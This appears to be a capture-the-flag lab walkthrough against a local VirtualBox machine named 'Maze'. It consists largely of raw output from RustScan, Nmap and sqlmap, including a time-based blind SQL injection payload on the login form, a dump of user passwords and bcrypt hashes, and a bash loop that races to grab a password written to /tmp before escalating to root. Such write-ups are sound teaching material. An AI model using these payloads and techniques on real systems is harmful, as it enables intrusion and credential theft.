[~] The config file is expected to be at "/root/.rustscan.toml" [~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'. Open 192.168.43.85:22 Open 192.168.43.85:80 [~] Starting Script(s) [>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.43.85 Depending on the complexity of the script, results may take some time to appear. [~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-07 17:32 +0800 NSE: Loaded 158 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 17:32 Completed NSE at 17:32, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 17:32 Completed NSE at 17:32, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 17:32 Completed NSE at 17:32, 0.00s elapsed Initiating ARP Ping Scan at 17:32 Scanning 192.168.43.85 [1 port] Completed ARP Ping Scan at 17:32, 0.03s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 17:32 Completed Parallel DNS resolution of 1 host. at 17:32, 0.50s elapsed DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 17:32 Scanning 192.168.43.85 [2 ports] Discovered open port 80/tcp on 192.168.43.85 Discovered open port 22/tcp on 192.168.43.85 Completed SYN Stealth Scan at 17:32, 0.01s elapsed (2 total ports) Initiating Service scan at 17:32 Scanning 2 services on 192.168.43.85 Completed Service scan at 17:33, 6.02s elapsed (2 services on 1 host) Initiating OS detection (try #1) against 192.168.43.85 Retrying OS detection (try #2) against 192.168.43.85 NSE: Script scanning 192.168.43.85. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 17:33 Completed NSE at 17:33, 0.24s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 17:33 Completed NSE at 17:33, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 17:33 Completed NSE at 17:33, 0.00s elapsed Nmap scan report for 192.168.43.85 Host is up, received arp-response (0.00052s latency). Scanned at 2026-05-07 17:32:59 CST for 10s
PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 10.0p2 Debian 7+deb13u1 (protocol 2.0) 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.66 ((Debian)) |_http-title: Maze |_http-server-header: Apache/2.4.66 (Debian) | http-methods: |_ Supported Methods: GET POST OPTIONS HEAD MAC Address: 08:00:27:53:73:55 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Android 5 - 10 (Linux 3.4 - 3.18) (93%), Linux 2.6.32 (93%), Google Chromecast or Roku TV (Linux 4.9) (93%), Android 10 - 12 (Linux 4.14 - 4.19) (93%), Linux 5.10 - 5.19 (93%), Linux 3.2 - 4.14 (93%), Linux 5.4 - 5.10 (93%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (93%), Linux 2.6.32 - 3.10 (93%) No exact OS matches for host (test conditions non-ideal). TCP/IP fingerprint: SCAN(V=7.99%E=4%D=5/7%OT=22%CT=%CU=30023%PV=Y%DS=1%DC=D%G=N%M=080027%TM=69FC5C55%P=x86_64-pc-linux-gnu) SEQ(SP=103%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=21) SEQ(SP=105%GCD=1%ISR=110%TI=Z%CI=Z%II=I%TS=22) OPS(O1=M5B4ST11NW8%O2=M5B4ST11NW8%O3=M5B4NNT11NW8%O4=M5B4ST11NW8%O5=M5B4ST11NW8%O6=M5B4ST11) WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88) ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW8%CC=Y%Q=) T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=) T2(R=N) T3(R=N) T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=) T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=) T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G) IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 0.000 days (since Thu May 7 17:33:07 2026) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=259 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE HOP RTT ADDRESS 1 0.52 ms 192.168.43.85
NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 17:33 Completed NSE at 17:33, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 17:33 Completed NSE at 17:33, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 17:33 Completed NSE at 17:33, 0.00s elapsed Read data files from: /usr/share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.46 seconds Raw packets sent: 47 (3.672KB) | Rcvd: 31 (2.616KB)
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:54:05 /2026-05-07/
[17:54:05] [INFO] parsing HTTP request from 'sqlmap.txt' [17:54:05] [INFO] resuming back-end DBMS 'mysql' [17:54:05] [INFO] testing connection to the target URL got a 302 redirect to 'http://192.168.43.85/index.html'. Do you want to follow? [Y/n] Y redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y you have not declared cookie(s), while server wants to set its own ('PHPSESSID=8650e27f642...248262ecb5'). Do you want to use those [Y/n] Y sqlmap resumed the following injection point(s) from stored session: --- Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=admin' AND (SELECT 8230 FROM (SELECT(SLEEP(5)))NhYU) AND 'oIyh'='oIyh&password=123 --- [17:54:05] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian web application technology: Apache 2.4.66, PHP back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [17:54:05] [INFO] fetching columns for table 'users' in database 'maze' [17:54:05] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done) do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y [17:54:10] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions [17:54:20] [INFO] adjusting time delay to 1 second due to good response times 3 [17:54:20] [INFO] retrieved: id [17:54:26] [INFO] retrieved: username [17:54:48] [INFO] retrieved: password [17:55:16] [INFO] fetching entries for table 'users' in database 'maze' [17:55:16] [INFO] fetching number of entries for table 'users' in database 'maze' [17:55:16] [INFO] retrieved: 628 [17:55:27] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done) 1 [17:55:29] [INFO] retrieved: seady1ECq9hD4VCkWQMH [17:56:35] [INFO] retrieved: admin [17:56:49] [INFO] retrieved: 2 [17:56:52] [INFO] retrieved: bamuwe [17:57:09] [INFO] retrieved: bamuwe [17:57:25] [INFO] retrieved: 3 [17:57:28] [INFO] retrieved: $2y$12$DhDKzqoWvVgPJCn0Y9ipqOmi.DExmEZ/OKAOY6Sthqtil1jROX8mS [18:01:18] [INFO] retrieved: Eecho [18:01:33] [INFO] retrieved: 4 [18:01:37] [INFO] retrieved: $2y$12$tOHpJn57IqRp1xdMGD4GCurKthwKx9Gj61p/tqhC6N74
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. bamuwe@RZDfly:~$ id uid=1001(bamuwe) gid=1001(bamuwe) groups=1001(bamuwe),100(users) bamuwe@RZDfly:~$
while true; do if [ -f /tmp/.a ]; then # 瞬间拷贝内容到 bamuwe 用户目录下,防止被 rm 删掉 cat /tmp/.a > /home/bamuwe/loot.txt 2>/dev/null # 检查是否成功抓取到非空内容 if [ -s /home/bamuwe/loot.txt ]; then echo "[+] 成功捕获密码!内容如下:" cat /home/bamuwe/loot.txt break fi fi done
这里不能su切换到root因为su没有s位
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
bamuwe@RZDfly:/tmp$ su root Password: su: Authentication failure bamuwe@RZDfly:/tmp$ ls -al /bin/su -rwxr-xr-x 1 root root 84360 May 9 2025 /bin/su bamuwe@RZDfly:/tmp$ ssh root@127.0.0.1 root@127.0.0.1's password: Linux RZDfly 6.19.14-1-liquorix-amd64 #1 ZEN SMP PREEMPT liquorix 6.19-11.1~trixie (2026-04-22) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Mon May 4 19:34:37 2026 from 192.168.3.84 root@RZDfly:~# id uid=0(root) gid=0(root) groups=0(root) root@RZDfly:~#